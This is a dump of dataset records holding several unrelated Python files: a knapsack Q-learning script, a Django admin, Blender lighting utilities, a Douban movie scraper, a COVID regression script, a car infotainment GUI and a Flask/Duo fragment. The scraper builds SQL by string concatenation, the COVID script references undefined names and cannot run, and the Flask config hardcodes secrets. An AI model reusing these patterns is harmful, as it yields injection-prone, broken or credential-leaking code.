| \".format(i_episode, num_episodes), end=\"\")\n\n return Q\n\n\nif __name__ == '__main__':\n # 訓練\n train_start_time = time()\n Q = qLearning(actions, num_episodes=1000, discount_factor=0.9, alpha=0.3, epsilon=0.1)\n train_finish_time = time()\n print(train_finish_time - train_start_time)\n print(Q)\n\n # 查看最终结果\n actionsList = []\n knapsack = []\n nA = len(actions)\n # 從實際執行的policy中選擇action\n action = np.random.choice(nA, p=pi_policy(Q, knapsack))\n t1 = time()\n for t in itertools.count():\n actionsList.append(action)\n # 執行action, 返回reward, 下一步的狀態及是否完成(超過背包限制或所有物品已放完)\n reward, next_knapsack, done = envReward(action, knapsack)\n if done:\n actionsList.pop()\n count = len(next_knapsack)\n if count >= 5:\n knapsack = next_knapsack\n break\n break\n else:\n # 選擇下一步動作\n next_action = np.random.choice(nA, p=pi_policy(Q, next_knapsack))\n action = next_action\n knapsack = next_knapsack\n t2 = time()\n print(t2 - t1)\n print(knapsack)\n\n","sub_path":"placement_rl.py","file_name":"placement_rl.py","file_ext":"py","file_size_in_byte":6377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"529526556","text":"from django.contrib import admin\n\nfrom .models import Jurisdiction, State, SurveyEmail\nfrom mailman.mailer import MailSurvey\n\n\nclass JurisdictionAdmin(admin.ModelAdmin):\n\n list_display = (\n 'name',\n 'state',\n 'website',\n 'telephone',\n 'email',\n 'city',\n )\n\n list_filter = ('state', 'city',)\n\n search_fields = ('name', 'state__name', 'telephone',)\n\n ordering = ['name']\n\n def changelist_view(self, request, extra_context=None):\n extra_context = {\n 'export_url': '/jurisdictions/emails',\n 'export_caption': 'Download Jurisdiction Emails',\n 'show_export_button': True\n }\n\n return super(JurisdictionAdmin, self).changelist_view(request, extra_context)\n\n\nclass StateAdmin(admin.ModelAdmin):\n\n list_display = (\n 'name',\n 'alpha',\n 'pollworker_website',\n )\n\n search_fields = ('name', 'alpha',)\n\n ordering = ['name']\n\ndef send_email(modeladmin, request, queryset):\n count_success = 0\n count_resend = 0\n tot_reqs = 0\n for email_req in queryset:\n tot_reqs +=1\n # Only send e-mail once\n if email_req.send_email == False:\n obj_list = email_req.jurisdiction.all()\n jurisdiction_list = []\n for jurisdiction in obj_list:\n jurisdiction_list.append([jurisdiction.name, jurisdiction.pk])\n jurisdiction_list.sort(key=lambda x: x[0])\n\n if ',' in email_req.recipients:\n recipient_list = email_req.recipients.split(',')\n elif '\\r\\n' in email_req.recipients:\n recipient_list = email_req.recipients.split('\\r\\n')\n elif '\\n' in email_req.recipients:\n recipient_list = email_req.recipients.split('\\n')\n elif ';' in email_req.recipients:\n recipient_list = email_req.recipients.split(';')\n else: #assume only one e-mail\n recipient_list = [email_req.recipients]\n \n recipient_list = [item.strip(' ') for item in recipient_list]\n \n # send email\n mail = MailSurvey(jurisdiction_list, recipient_list, email_req.email_text)\n status = mail.send()\n if status == 'OK':\n queryset.update(send_email=True)\n count_success+=1\n else:\n count_resend +=1\n \n message=\"\"\n if count_success > 0:\n message += \"{} out of {} e-mails were successfully sent.\".format(count_success, tot_reqs)\n if count_resend > 0:\n message += '{} out of {} e-mails have already been sent to their recipient. No action has been taken. 
To force a re-send, set \"Sent E-mail?\" to False'\n modeladmin.message_user(request, message)\n\nsend_email.short_description = \"Send e-mail\"\n\ndef mark_unsent(modeladmin, request, queryset):\n queryset.update(send_email=False)\nmark_unsent.short_description = \"Mark e-mail as not sent\"\n\nclass SurveyEmailAdmin(admin.ModelAdmin):\n list_display = (\n 'name', 'send_email', 'recipients'\n )\n actions = [send_email, mark_unsent]\n def get_readonly_fields(self, request, obj=None):\n return ['send_email']\n\nadmin.site.register(State, StateAdmin)\nadmin.site.register(SurveyEmail, SurveyEmailAdmin)\nadmin.site.register(Jurisdiction, JurisdictionAdmin)\n","sub_path":"apps/jurisdiction/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"470579039","text":"import bpy\r\nimport os\r\nimport json\r\nimport bgl\r\nimport gpu\r\nfrom gpu_extras.batch import batch_for_shader\r\nfrom bpy_extras import view3d_utils\r\nfrom mathutils import (\r\n\t\t\t\tVector,\r\n\t\t\t\tMatrix,\r\n\t\t\t\tQuaternion,\r\n\t\t\t\tEuler\r\n\t\t\t\t)\r\nfrom textwrap import wrap\r\nfrom math import (\r\n\tdegrees,\r\n\tradians,\r\n\tsin,\r\n\tcos,\r\n\tsqrt,\r\n\tatan2,\r\n\tacos,\r\n\tpi,\r\n\t)\r\n\r\n# -------------------------------------------------------------------- #\r\ndef raycast_light(self, event, context, range, ray_max=1000.0):\r\n\t\"\"\"Compute the location and rotation of the light from the angle or normal of the targeted face off the object\"\"\"\r\n\tlength_squared = 0\r\n\tscene = context.scene\r\n\tlight = context.active_object\r\n\trv3d = context.region_data\r\n\tregion = context.region\r\n\tcoord = (event.mouse_region_x, event.mouse_region_y)\r\n\r\n#---Get the ray from the viewport and mouse\r\n\t# Direction vector from the viewport to 2d coord\r\n\tview_vector = view3d_utils.region_2d_to_vector_3d(region, rv3d, (coord))\r\n\t# 3d view origin vector from the region\r\n\tray_origin = view3d_utils.region_2d_to_origin_3d(region, rv3d, (coord))\r\n\t# Define a default direction vector\r\n\tray_target = ray_origin + view_vector\r\n\r\n\tdepsgraph = context.evaluated_depsgraph_get()\r\n\t\r\n#---Select the targeted object\r\n\tdef visible_objects_and_duplis():\r\n\t\tif light.Lumiere.target :\r\n\t\t\tobj_trgt = light.Lumiere.target\r\n\t\t\tyield (obj_trgt, obj_trgt.matrix_world.copy())\r\n\t\telse:\r\n\t\t\tfor dup in depsgraph.object_instances:\r\n\t\t\t\tif dup.object.type == 'MESH':\r\n\t\t\t\t\tif dup.object.name not in context.scene.collection.children['Lumiere'].all_objects or \\\r\n\t\t\t\t\t(dup.object.name in context.scene.collection.children['Lumiere'].all_objects and \\\r\n\t\t\t\t\t(dup.object.Lumiere.color_type == 'Reflector' and dup.object.data.name != light.data.name)):\r\n\r\n\t\t\t\t\t\tif dup.is_instance:\r\n\t\t\t\t\t\t\tyield (dup.instance_object, dup.instance_object.matrix_world.copy())\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tyield (dup.object.original, dup.object.original.matrix_world.copy())\r\n\r\n\r\n#---Cast the ray to the targeted object\r\n\tdef obj_ray_cast(obj_trgt, matrix):\r\n\t#---Get the ray direction from the view angle to the targeted object\r\n\t\tmatrix_inv = matrix.inverted()\r\n\t\tray_origin_obj = matrix_inv @ ray_origin\r\n\t\tray_target_obj = matrix_inv @ ray_target\r\n\t\tray_direction_obj = ray_target_obj - ray_origin_obj\r\n\r\n\t#---Cast the ray\r\n\t\tsuccess, hit, normal, face_index = obj_trgt.ray_cast(ray_origin_obj, 
ray_direction_obj)\r\n\r\n\t\tif success:\r\n\t\t\treturn success, hit, normal\r\n\t\telse:\r\n\t\t\treturn None, None, None\r\n\r\n#---Find the closest object\r\n\t# best_length_squared = ray_max * ray_max\r\n\tbest_length_squared = -1.0\r\n\tbest_obj = None\r\n\r\n#---Find the position of the light using the reflect angle and the object targeted normal\r\n\tfor obj_trgt, matrix_trgt in visible_objects_and_duplis():\r\n\t\tsuccess, hit, normal = obj_ray_cast(obj_trgt, matrix_trgt)\r\n\r\n\t\tif success is not None :\r\n\t\t\t# Get the normal of the face from the targeted object\r\n\t\t\tnormal = matrix_trgt.to_3x3().inverted().transposed() @ normal\r\n\t\t\tnormal.normalize()\r\n\r\n\t\t#---Define the direction based on the normal of the targeted object, the view angle or the bounding box\r\n\t\t\tif light.Lumiere.reflect_angle == \"0\":\r\n\t\t\t\tself.reflect_angle = \"Accurate\"\r\n\t\t\t\treflect_dir = (view_vector).reflect(normal)\r\n\t\t\telif light.Lumiere.reflect_angle == \"1\":\r\n\t\t\t\tself.reflect_angle = \"Normal\"\r\n\t\t\t\tif obj_trgt.name in context.scene.collection.children['Lumiere'].all_objects:\r\n\t\t\t\t\treflect_dir = -normal\r\n\t\t\t\telse:\r\n\t\t\t\t\treflect_dir = normal\r\n\r\n\t\t\telif light.Lumiere.reflect_angle == \"2\":\r\n\t\t\t\tself.reflect_angle = \"Estimated\"\r\n\t\t\t\tif light.Lumiere.auto_bbox_center:\r\n\t\t\t\t\tlocal_bbox_center = 0.125 * sum((Vector(b) for b in obj_trgt.bound_box), Vector())\r\n\t\t\t\t\tglobal_bbox_center = obj_trgt.matrix_world @ local_bbox_center\r\n\t\t\t\telse:\r\n\t\t\t\t\tglobal_bbox_center = Vector(light.Lumiere.bbox_center)\r\n\t\t\t\treflect_dir = (matrix_trgt @ hit) - global_bbox_center\r\n\t\t\t\treflect_dir.normalize()\r\n\r\n\t\t#---Define light location : Hit + Direction + Range\r\n\t\t\tlight_loc = (matrix_trgt @ hit) + (reflect_dir * range)\r\n\r\n\t\t\tlength_squared = ((matrix_trgt @ hit) - ray_origin).length_squared\r\n\r\n\t\t\tif best_obj is None or length_squared < best_length_squared:\r\n\t\t\t\tbest_obj = obj_trgt\r\n\t\t\t\tbest_length_squared = length_squared\r\n\t\t\t\t_matrix_trgt = matrix_trgt\r\n\t\t\t\t_hit = hit\r\n\t\t\t\t_light_loc = light_loc\r\n\t\t\t\t_direction = reflect_dir\r\n\r\n\t\t\t\tif light.Lumiere.reflect_angle == \"2\":\r\n\t\t\t\t\tlight.Lumiere.bbox_center = global_bbox_center\r\n\t\t\t#---Parent the light to the target object\r\n\t\t\t\tlight.parent = obj_trgt\r\n\t\t\t\tlight.matrix_parent_inverse = matrix_trgt.inverted()\r\n\r\n#---Define location, rotation and scale\r\n\tif length_squared > 0 :\r\n\t\tif self.shift :\r\n\t\t\ttrack = light.location - Vector(_matrix_trgt @ _hit)\r\n\t\t\trotaxis = (track.to_track_quat('Z','Y')).to_euler()\r\n\t\telse :\r\n\t\t\trotaxis = (_direction.to_track_quat('Z','Y')).to_euler()\r\n\t\t\tlight.location = Vector((_light_loc[0], _light_loc[1], _light_loc[2]))\r\n\r\n\t\tlight.Lumiere.hit = (_matrix_trgt @ _hit)\r\n\r\n#---Update rotation and pitch for spherical coordinate\r\n\t\tx,y,z = light.location - Vector((light.Lumiere.hit))\r\n\t\tr = sqrt(x**2 + y**2 + z**2)\r\n\t\ttheta = atan2(y, x)\r\n\t\tif degrees(theta) < 0:\r\n\t\t\ttheta = radians(degrees(theta) + 360)\r\n\t\tlight.Lumiere.rotation = degrees(theta)\r\n\t\tphi = acos( z / r )\r\n\t\tlight.Lumiere.pitch = degrees(phi)\r\n\r\n\t\tlight.Lumiere.direction = _direction\r\n\t\tlight.rotation_euler = rotaxis\r\n\r\n# -------------------------------------------------------------------- #\r\ndef create_2d_circle(step, radius, rotation = 0, center_x=0, center_y=0):\r\n\t\"\"\" 
Create the vertices of a 2d circle at (0,0) \"\"\"\r\n\t#https://stackoverflow.com/questions/8487893/generate-all-the-points-on-the-circumference-of-a-circle\r\n\tindices = []\r\n\r\n\tverts = [(center_x, center_y)] + [(\r\n\t\t\tcos(2*pi / step*x + rotation)*radius + center_x,\r\n\t\t\tsin(2*pi / step*x + rotation)*radius + center_y\r\n\t\t\t) for x in range(0, step+1)]\r\n\r\n\tfor idx in range(len(verts) - 1):\r\n\t\ti1 = idx+1\r\n\t\ti2 = idx+2 if idx+2 <= step else 1\r\n\t\tindices.append((0,i1,i2))\r\n\r\n\treturn(verts, indices)\r\n\r\n# -------------------------------------------------------------------- #\r\ndef draw_circle(center_circle, radius_circle, steps):\r\n\t\"\"\" Return the coordinates + indices of a circle using a triangle fan \"\"\"\r\n\tindices = []\r\n\tcenter_x, center_y = center_circle\r\n\tradiusx = radius_circle[0] - center_circle[0]\r\n\tradiusy = radius_circle[1] - center_circle[1]\r\n\tradius = sqrt(radiusx**2 + radiusy**2)\r\n\trotation = radians(radius_circle[1] - center_circle[1]) / 2\r\n\t# steps = int(360 / steps)\r\n\r\n\t# Get the vertices of a 2d circle\r\n\tverts, indices = create_2d_circle(steps, radius, rotation, center_x, center_y)\r\n\r\n\treturn(verts, indices)\r\n\r\n\r\n# -------------------------------------------------------------------- #\r\ndef draw_shader(self, color, alpha, type, coords, size=1, indices=None):\r\n\t\"\"\" Create a batch for a draw type \"\"\"\r\n\tbgl.glEnable(bgl.GL_BLEND)\r\n\tbgl.glEnable(bgl.GL_LINE_SMOOTH)\r\n\tbgl.glPointSize(size)\r\n\tbgl.glLineWidth(size)\r\n\ttry:\r\n\t\tif len(coords[0])>2:\r\n\t\t\tshader = gpu.shader.from_builtin('3D_UNIFORM_COLOR')\r\n\t\telse:\r\n\t\t\tshader = gpu.shader.from_builtin('2D_UNIFORM_COLOR')\r\n\t\tbatch = batch_for_shader(shader, type, {\"pos\": coords}, indices=indices)\r\n\t\tshader.bind()\r\n\t\tshader.uniform_float(\"color\", (color[0], color[1], color[2], alpha))\r\n\t\tbatch.draw(shader)\r\n\t\tbgl.glLineWidth(1)\r\n\t\tbgl.glPointSize(1)\r\n\t\tbgl.glDisable(bgl.GL_LINE_SMOOTH)\r\n\t\tbgl.glDisable(bgl.GL_BLEND)\r\n\texcept:\r\n\t\texc_type, exc_value, exc_traceback = sys.exc_info()\r\n\t\tself.report({'ERROR'}, str(exc_value))\r\n\r\n# -------------------------------------------------------------------- #\r\ndef export_props_light(self, context):\r\n\t\"\"\"Export the current light data in JSON format\"\"\"\r\n\tlumiere_dict = {}\r\n\tlight = context.active_object\r\n\r\n\tlumiere_dict[light.name] = {}\r\n\tlumiere_dict[light.name]['Lumiere'] = light['Lumiere'].to_dict()\r\n\tlumiere_dict[light.name]['Lumiere']['light_type'] = light.Lumiere.light_type\r\n\tlumiere_dict[light.name]['rotation'] = tuple(light.matrix_world.to_euler())\r\n\tlumiere_dict[light.name]['scale'] = tuple(light.scale)\r\n\tlumiere_dict[light.name]['location'] = tuple(light.location)\r\n\tlumiere_dict[light.name]['Lumiere']['definition'] = list(wrap(light['Lumiere']['definition'], 50)) if \"definition\" in light['Lumiere'] else \" \"\r\n\r\n\t# lumiere_dict[light.name]['group'] = {}\r\n\t# for group in bpy.data.objects[light.name].users_group :\r\n\t# \t# lumiere_dict[light.name]['group'] = {group.name : list(wrap(group[\"Lumiere\"][\"definition\"], 50))} if \"definition\" in group[\"Lumiere\"] else {group.name : \" \"}\r\n\t# \tlumiere_dict[light.name]['group'].update({group.name : list(wrap(group['Lumiere']['definition'], 50))} if \"definition\" in group['Lumiere'] else {group.name : \" \"})\r\n\r\n\tmat = get_mat_name()\r\n\tif light.type == \"LAMP\":\r\n\t\tlamp = get_lamp(context, 
light.data.name)\r\n\t\tlumiere_dict[light.name]['smooth'] = light.data.node_tree.nodes[\"Light Falloff\"].inputs[1].default_value\r\n\telse:\r\n\t\tlumiere_dict[light.name]['smooth'] = mat.node_tree.nodes['Light Falloff'].inputs[1].default_value\r\n\r\n\t#---Gradient\r\n\t\tif light.Lumiere.color_type in (\"Linear\", \"Spherical\"):\r\n\t\t\t# lumiere_dict[light.name]['repeat'] = mat.node_tree.nodes['Math'].inputs[1].default_value\r\n\t\t\tcolramp = mat.node_tree.nodes['ColorRamp'].color_ramp\r\n\t\t\tlumiere_dict[light.name]['gradient'] = {}\r\n\t\t\tlumiere_dict[light.name]['interpolation'] = colramp.interpolation\r\n\t\t\tfor i in range(len(colramp.elements)):\r\n\t\t\t\tlumiere_dict[light.name]['gradient'].update({colramp.elements[i].position: colramp.elements[i].color[:]})\r\n\r\n\treturn(lumiere_dict)\r\n\r\n# -------------------------------------------------------------------- #\r\ndef get_mat_name():\r\n\t\"\"\"Return the name of the material of the light\"\"\"\r\n\tlight = bpy.context.object\r\n\tif bpy.context.object.type == 'MESH':\r\n\t\tmat = light.active_material\r\n\telse:\r\n\t\tmat = bpy.data.lights[light.data.name].name\r\n\r\n\treturn(mat)\r\n\r\n# -------------------------------------------------------------------- #\r\ndef get_lumiere_dict():\r\n\t\"\"\"Return the file of the exported lights in a dict format\"\"\"\r\n\r\n\tcurrent_file_dir = os.path.dirname(__file__)\r\n\tfile_name = os.path.join(current_file_dir, \"lumiere_dictionary.json\")\r\n\r\n\t#---Try to open the Lumiere export dictionary\r\n\ttry:\r\n\t\twith open(file_name, 'r', encoding='utf-8') as file:\r\n\t\t\tmy_dict = json.loads(file.read())\r\n\t\t\tfile.close()\r\n\texcept :\r\n\t\t# print(\"\\n[Lumiere ERROR]\\n\")\r\n\t\t# import traceback\r\n\t\t# traceback.print_exc()\r\n\t\tmy_dict = {}\r\n\treturn(my_dict)\r\n\r\n# -------------------------------------------------------------------- #\r\ndef update_lumiere_dict(my_dict):\r\n\t\"\"\"Update the file of the exported lights\"\"\"\r\n\tcurrent_file_dir = os.path.dirname(__file__)\r\n\r\n\twith open(current_file_dir + \"\\\\\" + \"lumiere_dictionary.json\", \"w\", encoding='utf-8') as file:\r\n\t\tjson.dump(my_dict, file, sort_keys=True, indent=4, ensure_ascii=False)\r\n\tfile.close()\r\n","sub_path":"lumiere_utils.py","file_name":"lumiere_utils.py","file_ext":"py","file_size_in_byte":10856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"591791107","text":"from sklearn.utils import resample\nimport pandas as pd\nimport os\nimport numpy as np\nimport sys\n# We want to work in ../data/
')\nfindRating = re.compile(r'<span class=\"rating_num\" property=\"v:average\">(.*)</span>')\nfindJudge = re.compile(r'<span>(\\d*)人评价</span>')\nfindInq = re.compile(r'<span class=\"inq\">(.*)</span>')\nfindBd = re.compile(r'<p class=\"\">(.*?)</p>
', re.S)\n\n\ndef main():\n    baseurl = \"https://movie.douban.com/top250?start=\"\n    # 1.爬取网页\n    datalist = getData(baseurl)\n    dbpath = \".\\\\豆瓣电影Top250.xls\"\n    dbpath1 = \".\\\\MovieTop250.db\"\n    # 3.保存数据\n    saveData(datalist, dbpath) # 保存到excel\n    saveDataDB(datalist, dbpath1) # 保存到数据库\n\n\n# 爬取网页\ndef getData(baseurl):\n    datalist = []\n    for i in range(0, 10):\n        url = baseurl + str(i * 25)\n        html = askURL(url)\n        # 2.逐一解析数据\n        soup = BeautifulSoup(html, \"html.parser\")\n        for item in soup.find_all('div', class_=\"item\"):\n            # print(item)\n            data = []\n            item = str(item)\n\n            # 获取影片详情链接\n            link = re.findall(findLink, item)[0] # re库用来通过正则表达式查找指定的字符串\n            data.append(link)\n\n            imgSrc = re.findall(findImgSrc, item)[0] # [0]找第一个\n            data.append(imgSrc)\n\n            titles = re.findall(findTitle, item) # 可有英文名\n            if (len(titles) == 2):\n                ctitle = titles[0] # 中文\n                data.append(ctitle)\n                otitle = titles[1].replace(\"/\", \"\") # 外国\n                otitle = re.sub('\\\xa0', \"\", otitle) # 去掉\\\xa0\n                data.append(otitle)\n            else:\n                data.append(titles[0])\n                data.append(' ')\n\n            rating = re.findall(findRating, item)[0]\n            data.append(rating)\n\n            judgeNum = re.findall(findJudge, item)[0]\n            data.append(judgeNum)\n\n            inq = re.findall(findInq, item)\n            if len(inq) != 0:\n                inq = inq[0].replace(\".\", \"\")\n                inq = re.sub('\\\xa0', \"\", inq)\n                data.append(inq)\n            else:\n                data.append(' ')\n\n            db = re.findall(findBd, item)[0]\n            db = re.sub('\\\xa0', \"\", db)\n            db = re.sub('<br(\\s+)?/>(\\s+)?', \" \", db) # 去掉<br/>
\n db = re.sub('/', \" \", db) # 替换/\n data.append(db.strip()) # 去掉前后空格\n datalist.append(data)\n # for item in datalist:\n # print(item)\n return datalist\n\n\n# 得到一个指定url的网页内容\ndef askURL(url):\n head = { # 模拟服务器头部信息,向豆瓣服务器发送消息\n \"User-Agent\": \"Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit / 537.36(KHTML, likeGecko) Chrome / 87.0.4280.88Safari / 537.36\"\n }\n\n request = urllib.request.Request(url=url, headers=head)\n html = \"\"\n try:\n response = urllib.request.urlopen(request)\n html = response.read().decode(\"utf-8\")\n # print(html)\n except urllib.error.URLError as e:\n if hasattr(e, \"code\"):\n print(e.code)\n if hasattr(e, \"reason\"):\n print(e.reason)\n return html\n\n\n# 保存数据到excel\ndef saveData(datalist, dbpath):\n # pass #pass占位无实际意义方便后期加入代码、调试等\n workbook = xlwt.Workbook(encoding=\"utf-8\") # 创建Workbook对象\n worksheet = workbook.add_sheet('豆瓣电影Top250', cell_overwrite_ok=True) # 创建工作表\n col = (\"电影详情链接\", \"图片链接\", \"影片中文名\", \"影片外国名\", \"评分\", \"评价数\", \"概况\", \"相关信息\")\n\n for i in range(0, 8):\n worksheet.write(0, i, col[i]) # 列名(行,列,内容)\n for i in range(0, 250):\n # print(\"第%d条\" %(i+1)\n data = datalist[i]\n for j in range(0, 8):\n worksheet.write(i + 1, j, data[j])\n workbook.save(dbpath)\n print(\"数据已存储到:\" + dbpath)\n\n\n# 保存数据到数据库\ndef saveDataDB(datalist, dbpath):\n init_db(dbpath)\n coon = sqlite3.connect(dbpath)\n cursor = coon.cursor()\n\n for data in datalist:\n for index in range(len(data)):\n if index == 4 or index == 5:\n continue\n data[index] = '\"' + data[index] + '\"'\n sql = '''\n INSERT INTO movieTop250 (\n info_link, pic_link, cname, ename, \n score, rated, instroduction, info\n ) \n VALUES (%s)''' % \",\".join(data)\n\n cursor.execute(sql)\n coon.commit()\n print(\"数据已存储到:\" + dbpath)\n cursor.close()\n coon.close()\n\n\n# 初始化创建数据库\ndef init_db(dbpath):\n sql = '''\n create table movieTop250(\n id integer primary key autoincrement,\n info_link text,\n pic_link text,\n cname varchar,\n ename varchar,\n score numeric,\n rated numeric,\n instroduction text,\n info text\n )\n '''\n conn = sqlite3.connect(dbpath) # 建立连接\n cursor = conn.cursor() # 创建游标\n cursor.execute(sql) # 执行sql语句\n conn.commit() # 提交sql操作\n cursor.close() # 关闭游标\n conn.close() # 关闭数据库\n\n\nif __name__ == \"__main__\": # 当程序执行时(程序入口类似int main(){})\n # 调用函数\n main()\n print(\"爬取完毕\")\n","sub_path":"Python/DoubanTop250/Spider.py","file_name":"Spider.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"361653133","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport sys\nfrom sklearn import linear_model\n\n\ndef print_list(lst: list):\n for element in lst:\n print(element)\n\n\nbase_path = 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data' \\\n '/csse_covid_19_time_series/'\nconfirmed_data_path = base_path + 'time_series_covid19_confirmed_global.csv'\nrecovered_data_path = base_path + 'time_series_covid19_recovered_global.csv'\n\ndata = pd.read_csv(confirmed_data_path)\n\nmean = data.iloc[0:, 4:170].values.mean()\ndata_x = data.iloc[0:, 4:169].values / mean\ndata_y = data.iloc[0:, 5:170].values / mean\n\nreg = linear_model.LinearRegression()\nreg.fit(list(map(lambda x: [x], data_x.flatten())), data_y.flatten())\n\nprint((reg.predict([[969]]) - 981) / 981)\nprint((reg.predict([[922853]]) - 927745) / 927745)\nprint((reg.predict([[1285084]]) - 1298718) / 1298718)\n\n\n# проверяем точность модели\ndata_x = 
data.iloc[0:, 169:-1].values.flatten()\ndata_y = data.iloc[0:, 170:].values.flatten()\ntotal_m = 0\nfor i in range(0, len(data_x)):\n if data_y[i] == data_x[i] == 0:\n continue\n if ((data_y[i] - data_x[i]) / data_y[i]) > 0.1:\n continue\n p = reg.predict([[data_x[i]]])\n m = abs(p - data_y[i]) / data_y[i]\n if m > 0.012:\n total_m += m[0]\n plt.plot(i, total_m, 'r.')\nprint('Total mistake:', total_m)\nplt.ylabel('Total mistake')\nplt.show()\n\n# ищем аномалии\nfor i in range(0, len(data_x)):\n if data_y[i] == data_x[i] == 0:\n continue\n m = (data_y[i] - data_x[i]) / data_y[i]\n if m > 0.1:\n plt.plot(i, m, 'r.')\n print(\"i=%d %d - %d = |%r|\" % (i, data_x[i], data_y[i], m))\nplt.ylabel('Data breaks')\nplt.show()\n\ns = 220\nresult = list()\nfor i in range(0, days):\n n = reg.predict([[s]])[0]\n result.append(int(n))\n s = n\n\nconfirmed = predict(confirmed_data_path, 100)\nrecovered = predict(recovered_data_path, 100)\n\nprint_list(confirmed)\n# print('-----------------------------------------------')\n# print_list(recovered)\n\ndata = pd.read_csv(confirmed_data_path)\nfor d in range(171, 267):\n data.iloc[0:, d]\n print((reg.predict([[969]]) - 981) / 981)\n","sub_path":"prophet_linear.py","file_name":"prophet_linear.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"439386955","text":"from tkinter import *\nfrom tkinter import ttk\nimport os\nfrom random import randint\nimport CAN_Main\n# Width: 1232\n# Height: 768\nfrom modules import BatteryRect, FuelRect, EfficiencyBar, InformationRectangle, WarningRectangle\n\ntry:\n import RPi.GPIO as GPIO\nexcept ImportError:\n # TODO Marc, write a shell script to re-run the main app as sudo, os.system(\"ps -ef | grep MainApplication.py | grep \"pid\" | kill; sudo MainApplication.py\")\n print(\"Error importing RPi.GPIO! This is probably because you need superuser privileges. You can achieve this by using 'sudo' to run your script\")\nexcept RuntimeError:\n print(\"Error importing RPi.GPIO! This is probably because you need superuser privileges. 
You can achieve this by using 'sudo' to run your script\")\n\nCHANGE_GUI_MODE_PIN = 21\nREBOOT_PIN = 20\n\nclass MainApplication(object):\n root = Tk()\n frame_rate = 40\n def __init__(self):\n # self.initializeInterrupts() # TODO marc implement once GPIO PINS are setup\n self.initializeMainWindow()\t\n\n self.battery = BatteryRect.BatteryRect(self.root)\n self.fuel = FuelRect.FuelRect(self.root)\n self.infoRect = InformationRectangle.InformationRectangle(self.root)\n self.warnRect = WarningRectangle.WarningRectangle(self.root)\n\n self.canMain = CAN_Main.CAN_Main()\n self.canMain.initializeInstances()\n \t\t\n def run(self):\n self.pollBus()\n self.checkForUpdates()\n self.root.mainloop()\n\n def initializeMainWindow(self):\n self.root.configure(bg=\"white\")\n self.root.title(\"Fuel-Mileage-test\")\n self.root.attributes(\"-fullscreen\", True)\n self.root.bind()\n self.state = False\n self.root.bind(\"\", self.toggle_fullscreen)\n self.root.bind(\"\", self.end_fullscreen)\n \n def toggle_fullscreen(self, event=None):\n self.state = not self.state # Just toggling the boolean\n self.root.attributes(\"-fullscreen\", self.state)\n return \"break\"\n\n def end_fullscreen(self, event=None):\n self.state = False\n self.root.attributes(\"-fullscreen\", False)\n return \"break\"\n\n def pollBus(self):\n self.canMain.pollBus()\n self.root.after(self.frame_rate, self.pollBus)\n\t\n \n def checkForUpdates(self):\n if self.canMain.update_vehicle_speed:\n self.infoRect.updateSpeedRectangle(self.canMain.current_vehicle_speed)\n self.canMain.update_vehicle_speed = False\n\n if self.canMain.update_engine_RPM:\n self.infoRect.updateRPMRectangle(self.canMain.current_engine_RPM)\n self.canMain.update_engine_RPM = False\n \n if self.canMain.update_throttle_percent:\n self.infoRect.updateEngineTPS(self.canMain.current_throttle_percent)\n self.canMain.update_throttle_percent = False\n \n if self.canMain.update_engine_coolant_temp:\n self.infoRect.updateCoolantRectangle(self.canMain.current_engine_coolant_temp)\n self.canMain.update_engine_coolant_temp = False\n\n if self.canMain.update_ess_soc:\n self.infoRect.updateChargeRectangle(self.canMain.current_ess_soc)\n self.battery.updateBatteryCharge(self.canMain.current_ess_soc)\n self.canMain.update_ess_soc = False\n \n# TODO Need to implement can interface for fuel\n# if self.canMain.update_fuel_level:\n# \n# TODO Need to implement can interface for motor TPS\n \n self.root.after(self.frame_rate, self.checkForUpdates)\n\t\n def changeGuiMode(self, channel):\n # TODO Marc, need to cleanup properly, clear all widgets below root\n # Then go to next mode...\n print(\"Changing Modes\")\n\n def rebootSystem(self, channel):\n # TODO marc: we need to cleanup the gui prior to restarting..\n GPIO.cleanup()\n # os.system(\"sudo reboot\")\n\n def initializeInterrupts(self):\n GPIO.setmode(GPIO.BCM)\n \n GPIO.setup(REBOOT_PIN, GPIO.IN)\n GPIO.setup(CHANGE_MODE_PIN, GPIO.IN)\n \n GPIO.add_event_detect(REBOOT_PIN, GPIO.FALLING, callback=self.rebootSystem)\n GPIO.add_event_detect(CHANGE_GUI_MODE_PIN, GPIO.FALLING, callback=self.changeGuiMode)\n\t\nif __name__ == \"__main__\":\n mainApp = MainApplication()\n mainApp.run()\n","sub_path":"infotainment/src/MainApplication.py","file_name":"MainApplication.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"403089725","text":"from utility import TrailingStopLoss\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG,\n 
format='%(asctime)s - %(levelname)s : %(message)s',\n datefmt='%Y%m%dT%H%M%S')\nlogging.info('Info message')\n\nif __name__ == '__main__':\n def callback():\n logging.info('stop loss')\n\n\n s = TrailingStopLoss('xxxxx', 30, 0.1, callback)\n\n\n\n for i in range(5):\n s.update(i)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"68944997","text":"import sqlite3\nimport ConfigParser\nimport duo_web as duo\nfrom contextlib import closing\nfrom flask import Flask, request, session, g, redirect, url_for, abort, render_template, flash\n\n# config\nDATABASE = '/tmp/flaskr.db'\nDEBUG = True\nSECRET_KEY = 'dev key'\nUSERNAME = 'andrew'\nPASSWORD = 'default'\n\n\n# create flask application\napp = Flask(__name__)\napp.config.from_object(__name__)\n\n\n# config parser\ndef grab_keys(filename='duo.conf'):\n config = ConfigParser.RawConfigParser()\n config.read(filename)\n\n akey = 